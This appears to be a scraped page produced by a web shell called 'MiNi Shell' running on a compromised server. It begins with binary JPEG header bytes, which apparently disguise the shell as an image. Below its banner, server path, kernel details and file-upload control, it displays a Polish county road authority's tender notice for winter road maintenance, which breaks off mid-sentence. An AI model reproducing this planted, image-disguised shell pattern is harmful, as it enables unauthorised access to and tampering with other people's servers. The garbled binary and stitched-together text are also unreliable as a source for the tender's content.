JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211007/0022329001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg powiatowych w sezonie 2021/2022 na terenie Powiatu Ryckiego z podziałem na cztery zadania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Rykach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029636</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ryki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdpryki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpryki.e-biuletyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami i utrzymanie dróg powiatowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg powiatowych w sezonie 2021/2022 na terenie Powiatu Ryckiego z podziałem na cztery zadania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-763462ca-2759-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00223290</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002204/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 „Zimowe utrzymanie dróg powiatowych w sezonie 2021/2022 na terenie powiatu ryckiego”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpryki.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdpryki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, odbywa się za pośrednictwem Platformy znajdującej się pod adresem: https://zdpryki.ezamawiajacy.pl oraz poczty elektronicznej – adres: sekretariat@zdpryki.pl, kinga.stepnicka@zdpryki.pl. Ofertę oraz załączniki do oferty należy złożyć wyłącznie za pośrednictwem Platformy. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłynął do Zamawiającego, uważa się za dokumenty złożone w terminie jeżeli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. W celu zapoznania się z dokumentacją postępowania Wykonawca w menu po lewej stronie wybiera zakładkę „Lista przetargów PZP”, następnie zakładkę „Aktualne”, wyszukuje przedmiotowe postępowanie i klika w wybrany link, przechodząc do obszaru postępowania (po upływie terminu składania ofert dokumentacja jest dostępna w zakładce „W toku”). Zadawanie pytań do treści SWZ za pośrednictwem Platformy: bez logowania – poprzez funkcjonalność „Zadaj pytanie”, poprzez funkcjonalność „Przystąp do postępowania” i po zalogowaniu się na konto użytkownika w zakładce „Korespondencja”. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zarządu Dróg Powiatowych w Rykach pod adresem: https://zdpryki.ezamawiajacy.pl. Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony http://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych, w związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Szczegółowe zasady korzystania z Platformy znajdują się w zakładce „Regulacje i procedury procesu zakupowego” - Instrukcja dla Wykonawcy. Dokumenty elektroniczne - inne niż oferta i załączniki do oferty - oraz cyfrowe odwzorowania dokumentów mogą być składane przez Wykonawcę za pośrednictwem platformy pod adresem: https://zdpryki.ezamawiajacy.pl lub za pomocą poczty elektronicznej na adres : sekretariat@zdpryki.pl kinga.stepnicka@zdpryki.pl. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa tel. +48 (22) 257 22 23, e-mail: oneplace@marketplanet.pl, od poniedziałku do piątku, z wyjątkiem dni ustawowo wolnych od pracy, w godz. 9:00-17:00. Zamawiający, określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji (w przypadku Internet Explorer minimalnie wersja 10.0), włączona obsługa JavaScript; zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający określa przykładowe formaty przesyłanych danych tj. plików o wielkości do 100 MB doc, docx, rtf, pdf, .zip, rar, 7zip. Przy czym preferowany format to pdf. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert. oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Instytutu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Dyrektor Zarządu Dróg Powiatowych w Rykach z siedzibą przy ul. Kolejowej 5, 08-500 Ryki (nr tel.81 8652 394, adres e-mail: sekretariat@zdpryki.pl).<br/>•	dane kontaktowe inspektora ochrony danych osobowych: kontakt pisemny za pomocą poczty tradycyjnej na adres Zarząd Dróg Powiatowych w Rykach, ul. Kolejowa 5, 08-500 Ryki, adres e-mail: sekretariat@zdpryki.pl tel.81 8652 394<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i art. 74 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych (Dz.U. 2021 poz. 1129 ze zm.);<br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/PN/16/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zadanie nr 1 – Utrzymanie zimowe dróg na terenie gminy Kłoczew, Nowodwór, Ułęż, Ryki i Stężyca<br/>Zakres zadania obejmuje:<br/>•	Zwalczanie śliskości, odśnieżanie dróg – posypywanie dróg powiatowych, usuwanie śniegu z jezdni dla utrzymania przejezdności, materiałami wykorzystywanymi do ich posypywania w czasie zimowego utrzymania dróg,<br/>•	Po sezonie zimowym jednorazowe oczyszczenie z materiału uszorstniającego jezdni, i zatkanych kratek ściekowych wraz z wywozem: (dokładną lokalizację wskaże Zamawiający)<br/>	na terenie miasta Ryki – 11 km,<br/>	na terenie gminy Ryki – 9,00 km, <br/>	na terenie gminy Ułęż – 14 km,<br/>	na terenie gminy Nowodwór – 7,00 km,<br/>	na terenie gminy Kłoczew – 7,00 km,<br/>	na terenie gminy Stężyca – 7,00 km.<br/>Zadanie należy wykonać za pomocą następującego sprzętu:<br/>•	samochody ciężarowe co najmniej trzyosiowe wraz z ciężkimi pługami oraz piaskarkami lub piaskarko-solarkami (co najmniej 4 szt.)<br/>Pługi odśnieżne powinny być w należytym stanie technicznym, mieć równomierny docisk na całej długości oraz gumę dociskową w dobrym stanie.<br/>Zakładana ilość pracy :<br/>•	Likwidacja śliskości na drodze mieszanką piasek-sól do 500 godzin<br/>•	Odśnieżanie nawierzchni jezdni do 500 godzin<br/>•	Jednorazowe oczyszczenie z materiału uszorstniającego jezdni i zatkanych kratek ściekowych wraz z wywozem, po zakończeniu akcji zimowej	<br/>Powyższe wielkości stanowią podstawę do kalkulacji cen oferty, z zastrzeżeniem że rzeczywista ilość godzin wykonywania usługi może się różnić co uwarunkowane będzie rzeczywistymi warunkami atmosferycznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>•	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>•	oferta została złożona, w określonym przez Zamawiającego terminie,<br/>•	wykonawca przedstawił ofertę zgodną, co do treści z wymaganiami Zamawiającego.<br/>2.	Za najkorzystniejszą zostanie uznana oferta, która w wyniku oceny spełni wszystkie wymogi zawarte w ustawie i SWZ oraz otrzyma najwyższą liczbę punktów.<br/>3. Zamawiający dokona wyboru najkorzystniejszej oferty według następujących kryteriów:<br/>a)	Cena - 60 %<br/>Sposób oceny:<br/>Lp = Cn/Cb x 60% x 100<br/>gdzie:<br/>Lp - liczba punktów<br/>Cn- najniższa cena wśród ofert<br/>Cb - cena badanej oferty<br/><br/>Z tytułu kryterium „cena" Wykonawca może uzyskać maksymalnie 60 pkt.<br/><br/>b)	„Czas reakcji od momentu zgłoszenia” <br/>4.	Czas reakcji należy rozumieć jako wyrażony w minutach maksymalny okres czasu jaki może upłynąć od chwili wydania przez Zamawiającego dyspozycji realizacji usług Zimowego Utrzymania Dróg, a rozpoczęciem wykonywania tych usług przez Wykonawcę.<br/>5.	Zamawiający przyzna Wykonawcy w tym kryterium punkty w następujący:<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 40 min. – oferta otrzyma 40 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 60 min - oferta otrzyma 20 pkt.<br/>•	Jeżeli z treści złożonej oferty będzie wynikało, że Wykonawca będzie świadczył usługi stanowiące przedmiot zamówienia, z czasem reakcji Wykonawcy 80 min. – oferta otrzyma 0 pkt.<br/>6.	W przypadku braku podania czasu rozpoczęcia akcji od momentu zgłoszenia w ofercie bądź niezgodnego z podanym powyżej kryterium, zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5) ustawy <br/>7.	Z tytułu kryterium „czas reakcji od momentu zgłoszenia" Wykonawca może uzyskać maksymalnie 40 pkt. <br/>8.	Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>9.	Ilość punktów = ilość punktów uzyskanych w kryterium „cena”+ ilość punktów uzyskanych w kryterium „czas reakcji od momentu zgłoszenia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji od momentu zgłoszenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Zadanie nr 2 – Zimowe utrzymanie chodników i ścieżek rowerowych na terenie miasta Ryki<br/>Zakres zadania obejmuje:<br/>•	Odśnieżanie i zwalczanie śliskości na chodnikach i ścieżkach rowerowych – posypywanie chodników i ścieżek rowerowych, usuwanie śniegu dla utrzymania ciągłości komunikacyjnej, materiałami wykorzystywanymi do ich posypywania w czasie zimowego utrzymania;<br/>•	Po sezonie zimowym jednorazowe oczyszczenie z materiału uszorstniającego chodników i ścieżek rowerowych wraz z wywozem na terenie miasta Ryki.<br/>Zadanie należy wykonać za pomocą następującego sprzętu:<br/>•	sprzęt do odśnieżania, posypywania chodników i ścieżek rowerowych (co najmniej 1 szt.)<br/>Pługi odśnieżne powinny być w należytym stanie technicznym, mieć równomierny docisk na całej długości oraz gumę dociskową w dobrym stanie.<br/>Zakładana ilość pracy:<br/>•	Odśnieżanie i posypywanie chodników oraz ścieżek rowerowych do 200 godzin<br/>Zakładana ilość materiału uszorstniającego wykorzystywanego do zwalczania śliskości na chodnikach i ścieżkach rowerowych :<br/>•	Piach do 50 ton<br/>•	Jednorazowe oczyszczenie z materiału uszorstniającego chodników i ścieżek rowerowych wraz z wywozem, po zakończeniu akcji zimowej.<br/>Powyższe wielkości stanowią podstawę do kalkulacji cen oferty, z zastrzeżeniem że rzeczywista ilość godzin wykonywania usługi oraz materiału do uszorstniania może się różnić co uwarunkowane będzie rzeczywistymi warunkami atmosferycznymi.<br/>W przypadku braku możliwości mechanicznego odśnieżenia chodników lub ścieżek rowerowych należy wykonać je siłami własnymi Wykonawcy.<br/>Z uwagi na powyższe Wykonawca musi dysponować potencjałem kadrowym w ilości co najmniej 3 osób odpowiedzialnych za wykonanie przedmiotowego zadania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90612000-0 - Usługi zamiatania ulic</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>•	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>•	oferta została złożona, w określonym przez Zamawiającego terminie,<br/>•	wykonawca przedstawił ofertę zgodną, co do treści z wymaganiami Zamawiającego.<br/>2.	Za najkorzystniejszą zostanie uznana oferta, która w wyniku oceny spełni wszystkie wymogi zawarte w ustawie i SWZ oraz otrzyma najwyższą liczbę punktów.<br/>3. Zamawiający dokona wyboru najkorzystniejszej oferty według następujących kryteriów:<br/>a)	Cena - 60 %<br/>Sposób oceny:<br/>Lp = Cn/Cb x 60% x 100<br/>gdzie:<br/>Lp - liczba punktów<br/>Cn- najniższa cena wśród ofert<br/>Cb - cena badanej oferty<br/><br/>Z tytułu kryterium 